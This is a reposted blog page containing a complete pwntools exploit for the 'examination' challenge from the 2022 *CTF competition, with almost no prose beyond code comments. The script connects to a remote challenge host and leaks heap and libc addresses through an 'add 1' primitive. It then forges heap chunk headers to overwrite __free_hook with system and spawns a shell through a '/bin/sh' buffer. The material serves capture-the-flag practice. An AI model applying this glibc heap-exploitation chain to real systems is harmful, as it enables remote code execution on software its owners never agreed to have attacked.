2022 *CTF examination

2022-05-09 18:03:56  Views: 220  Source: Internet


exp

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'

# s = process('./examination')
s = remote('124.70.130.92', 60001)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


def init_role(role):
    # 0 = teacher, 1 = student
    s.sendlineafter(b'role: <0.teacher/1.student>: ', str(role).encode())


# ---- teacher menu wrappers ----
def add_s(num):
    # add `num` students (one record each)
    s.sendlineafter(b'choice>> ', b'1')
    s.sendlineafter(b'enter the number of questions: ', str(num).encode())


def give_score():
    s.sendlineafter(b'choice>> ', b'2')


def write_view(c, index, size, comment):
    # write a comment for student `index`; with c == 0 a buffer of `size`
    # bytes is requested first, with c != 0 the existing buffer is reused
    s.sendlineafter(b'choice>> ', b'3')
    s.sendlineafter(b'which one? > ', str(index).encode())
    if c:
        s.sendafter(b'enter your comment:\n', comment)
    else:
        s.sendlineafter(b'please input the size of comment: ', str(size).encode())
        s.sendafter(b'enter your comment:\n', comment)


def call_parent(index):
    s.sendlineafter(b'choice>> ', b'4')
    s.sendlineafter(b'which student id to choose?', str(index).encode())


def change_role(role):
    # choice 5 in both the teacher and the student menu
    s.sendlineafter(b'choice>> ', b'5')
    s.sendlineafter(b'role: <0.teacher/1.student>: ', str(role).encode())


def t_exit():
    s.sendlineafter(b'choice>> ', b'6')


# ---- student menu wrappers ----
def test():
    s.sendlineafter(b'choice>> ', b'1')


def check(ptr):
    # option 2: after the reward message the program adds 1 to the address given
    s.sendlineafter(b'choice>> ', b'2')
    s.sendafter(b'add 1 to wherever you want! addr: ', ptr)


def pray():
    s.sendlineafter(b'choice>> ', b'3')


def mode(p, score, mode_data):
    s.sendlineafter(b'choice>> ', b'4')
    if p:
        s.sendlineafter(b'enter your pray score: 0 to 100\n', str(score).encode())
    else:
        s.sendafter(b'enter your mode!\n', mode_data)


def change_id(index):
    s.sendlineafter(b'choice>> ', b'6')
    s.sendlineafter(b'input your id: ', str(index).encode())


# 0x5080

init_role(0)

# stage 1: as teacher, create three students and give each a 0x80-byte comment
add_s(1)  # 0
add_s(1)  # 1
add_s(1)  # 2
write_view(0, 0, 0x80, b'a' * 0x80)
write_view(0, 1, 0x80, b'a' * 0x80)
write_view(0, 2, 0x80, b'a' * 0x80)

# stage 2: as student, pray, switch to id 2 and pray again, then let the teacher score
change_role(1)
pray()
change_id(2)
pray()

change_role(0)
give_score()

# stage 3: student 2's reward message leaks a heap pointer; the "add 1"
# primitive is then aimed at heap_base + 0x1f
change_role(1)
change_id(2)

s.sendlineafter(b'choice>> ', b'2')
s.recvuntil(b'Good Job! Here is your reward! ')
heap_base = int(s.recv(14), 16) - 0x340
success('heap_base=> ' + hex(heap_base))

ptr = heap_base + 0x1f
success('ptr1=>' + hex(ptr))
s.sendafter(b'add 1 to wherever you want! addr: ', str(ptr).encode())

# stage 4: teacher adds a fourth student with a comment and calls student 1's parent
change_role(0)
add_s(1)  # 3
write_view(0, 3, 0x80, b'a' * 0x80)
call_parent(1)

# stage 5: second reward leak (the heap offset differs now) and a second "add 1"
# at heap_base + 0x2e2; the reply that follows carries a libc pointer
change_role(1)
s.sendlineafter(b'choice>> ', b'2')
s.recvuntil(b'Good Job! Here is your reward! ')
heap_base = int(s.recv(14), 16) - 0x2a0
success('heap_base=> ' + hex(heap_base))

ptr = heap_base + 0x2e2
success('ptr2=>' + hex(ptr))
s.sendafter(b'add 1 to wherever you want! addr: ', str(ptr).encode())

libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x1ecbe0
success('libc_base=>' + hex(libc_base))

system = libc_base + libc.sym['system']

# stage 6: rewrite student 0's comment with forged chunk headers so that the
# record reached through student 3 ends up pointing at __free_hook
change_role(0)

payload = b'/bin/sh\x00' + b'a' * 0x80 + p64(0x91) + b'b' * 0x80 + p64(0x90) * 2 + b'c' * 0x88
payload += p64(0x31) + p64(heap_base + 0x570) + b'\x00' * 0x20
payload += p64(0x21) + p64(0x1) + p64(libc_base + libc.sym['__free_hook'])

write_view(1, 0, 0x80, payload)

# writing student 3's comment now stores system's address at __free_hook
write_view(1, 3, 0x80, p64(system))

# releasing student 0's comment, which begins with "/bin/sh", goes through __free_hook
call_parent(0)

# gdb.attach(s)
s.interactive()

Source: https://www.cnblogs.com/pwnfeifei/p/16250158.html
